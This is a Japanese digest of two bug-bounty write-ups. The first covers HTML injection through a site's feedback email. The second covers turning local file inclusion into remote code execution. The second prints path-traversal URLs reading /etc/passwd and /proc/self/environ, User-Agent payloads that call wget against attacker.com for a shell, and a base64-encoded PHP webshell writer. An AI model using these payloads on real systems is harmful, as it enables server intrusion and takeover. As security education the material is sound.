Hello there, ('ω')ノ

メールへの HTML インジェクションを。

脆弱性：

　HTMLインジェクション

記事：

　https://medium.com/@whitehatcyber404/how-i-earned-150-in-2-minutes-html-injection-in-email-3f26f27d3822

序章 ：

今回は、バグ報奨金プログラムの電子メールで HTML インジェクションを。

見つけた方法について。

まず、ターゲットの example.com を呼ぶことに。

HTML インジェクションとは、クロス サイト スクリプティングとも呼ばれて。

１．HTML インジェクションは、他のユーザが閲覧している Web ページに。

　攻撃者が HTML コードを挿入できるセキュリティ上の脆弱性で。

２．HTML インジェクションは、アプリケーションがユーザ入力を受け取り。

　その入力を HTML に埋め込む脆弱性で。

　悪意のあるユーザは、ユーザ入力を介して HTML を挿入し。

　アプリケーションによって生成される HTML 全体に悪意のある HTML を。

　埋め込むことができて。

再現する手順 ：

１．https://www.example.com に移動して。

２．この Web サイトにフィードバックのポップアップが表示されて。

３．フォームに入力し、フィードバック列に HTML ペイロードを入力し。

　被害者の電子メールを入力して「送信」ボタンをクリックして。

ペイロード：

<img src=”https://static.wikia.nocookie.net/mrbean/images/4/4b/Mr_beans_holiday_ver2.jpg">

４．メールの受信トレイを確認すると、HTML タグが実行されて。

深刻な脆弱性：

　他のユーザの悪用

　汚染

　フィッシング

影響 ：

HTML インジェクション、フィッシング攻撃 この脆弱性により。

Mobile Vikings の公式メール アドレスからのメールが再フォーマット／編集され。

標的型フィッシング攻撃に使用される可能性があり。

おそらく、この種の脆弱性を利用した攻撃者で。

18 枚以上の画像を送信する可能性は非常に高くなり。

会社名に関する誤解は、人々に影響を与える可能性があって。

解決策：

入力のサニタイズと検証は、通常、防御の最初のレイヤーで。

サニタイズは、ユーザ入力から安全でない文字を削除することで構成され。

検証により、データが期待される形式とタイプであるかどうかがチェックされて。

Best regards, (^^ゞ

Hello there, ('ω')ノ

20000 人以上のユーザがいる Web サイトで LFI を RCE に活用を。

脆弱性：

　LFI

　RCE

記事：

　https://infosecwriteups.com/leveraging-lfi-to-rce-in-a-website-with-20000-users-129050f9982b

LFI 脆弱性の発見：

Web サイトを参照して、興味深いエンドポイントを見つけられるかどうかを。

確認するのに [お問い合わせ] をクリックすると。

興味深いエンドポイントにつながって。

　https://www.website.com/index.php?pg=contact.php

pg パラメータのファジングを開始したところ、次のペイロードを使用して。

LFI が可能であることがわかって。

　https://www.website.com/index.php?pg=../../../../etc/passwd

これまでのところ、LFI はうまくいっていますが、影響を増やすことに。

LFIからRCEへ：

LFI の脆弱性を RCE にエスカレートするために考えられるすべての既知の手法を。

使用したところ、/proc/self/environ を読み取ることができることがわかったので。

次のコードを入力すると情報が漏洩して。

　https://www.website.com/index.php?pg=../../../../proc/self/environ

出力を分析すると、/proc/self/environ の下にあるファイルに。

HTTP_USER_AGENT などのいくつかの環境変数が含まれていることがわかって。

Burp Suite を起動して、User-Agent の値を変更してリクエストを送信して。

User-Agent に次の値を追加してみると。

system() を試しましたが、RCE はなし：

　User-Agent: <?system('wget http://attacker.com/shell.txt -O shell.php');?>

exec() を試しましたが、RCE はなし：

　User-Agent: <?exec('wget http://attacker.com/shell.txt -O shell.php');?>

phpinit() を試しましたが、失敗：

　User-Agent: <?php phpinfo(); ?>

サーバ内にファイルを書き込めるのを忘れていたので。

以下のペイロードを試すことに。

User-Agent HTTP ヘッダで使用するペイロードを作成することに。

User-Agent: <?php $a = base64_decode('PD9waHAgCiAgJGEgPSAkX1BPU1RbJ2NvZGUnXTsKICAkZmlsZSA9IEBmb3BlbigkX1BPU1RbJ2ZpbGUnXSwndycpOwogIEBmd3JpdGUoJGZpbGUsJGEpOwogIEBmY2xvc2UoJGZpbGUpOwo/Pgo8Y2VudGVyPgogIDxmb3JtIG1ldGhvZD0icG9zdCIgaWQ9ImZvcm0iPgogICAgPGgyPkZpbGUgV3JpdGVyPC9oMj4KICAgIEZpbGUgTmFtZTxicj48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZmlsZSIgcGxhY2Vob2xkZXI9InNoZWxsLnBocCI+PGJyPgogICAgU2hlbGwgQ29kZTxicj48dGV4dGFyZWEgbmFtZT0iY29kZSIgZm9ybT0iZm9ybSIgcGxhY2Vob2xkZXI9IlBhc3RlIHlvdXIgc2hlbGwgaGVyZSI+PC90ZXh0YXJlYT48YnI+CiAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iV3JpdGUiPgogIDwvZm9ybT4KPC9jZW50ZXI+Cg=='); $file = fopen('nadeshot.php','w'); echo fwrite($file,$a); fclose($file); ?>

使用ペイロードの説明：

Webshel​​l は base64 でエンコードされていて、変数a に格納されて。

元の webshel​​l php コードは 下記のもので。

　https://github.com/alita-ido/PHP-File-Writer/blob/master/lfi-writer.php

$a = base64_decode('webshel​​l_base64_encoded_code_here');

その後、nadeshot.php という名前のファイルを書き込むようにサーバに指示して。

　$file = fopen('nadeshot.php','w');

次に、サーバーはコード (base64 でデコード) を nadeshot.php に書き込みます。

　echo fwrite($file,$a);

次に、サーバはファイルを保存します。

　fclose($file);

それでは、このペイロード全体を Burp Suite で実行してみて、何が起こるかを。

レスポンス 200 (OK) を取得して。

https://website.com/nadeshot.php に移動して。

正常に実行されたかどうかを確認することに。

下記が、アップロードされた webshel​​lで。

webshel​​lは、 /nadeshot.php にアップロードされて。

それでは、単純な .txt ファイルを作成して動作するかどうかを確認すると。

nadeshot.txt という名前のテキスト ファイルを作成し、[Write] をクリックして。

https://website.com/nadeshot.txt にアクセスすると。

テキスト ファイルが表示されて。

LFI から RCE への影響力を高めることに成功して。

Best regards, (^^ゞ